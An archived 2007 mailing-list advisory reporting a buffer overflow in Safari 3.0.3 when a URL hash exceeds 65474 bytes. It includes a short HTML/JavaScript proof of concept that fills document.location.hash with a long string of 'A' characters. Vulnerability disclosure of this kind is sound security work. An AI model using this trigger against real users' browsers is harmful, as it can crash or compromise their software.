Pantek Library
Hosting Provided By
CybrHost
High Speed Hosting

Safari 3.0.3 (522.15.5) Buffer overflow

From: <azizov(at)itdefence.ru>
Date: Fri Sep 07 2007 - 12:28:06 EDT


Azizov E. (azizov@itdefence.ru)

  1. At processing of data, which has more than 65474 bytes in size, occurs buffer overflow.

POC:
<html>
<body>
<script>

var maxbuf = 65474;

buff = "A";
for (i=0;i<maxbuf;i++) { buff = buff+"A"; } document.location.hash = buff+"BOW! ";
alert(document.location.hash);
</script>
</body>
</html>
Received on Fri Sep 7 12:40:09 2007

This archive was generated by hypermail 2.1.8 : Sun Oct 28 2007 - 06:14:53 EDT


Contact Us  Legal Notices  Order Services Online 
Pantek Home  Privacy Policy  IT news  Site Map  Pantek Library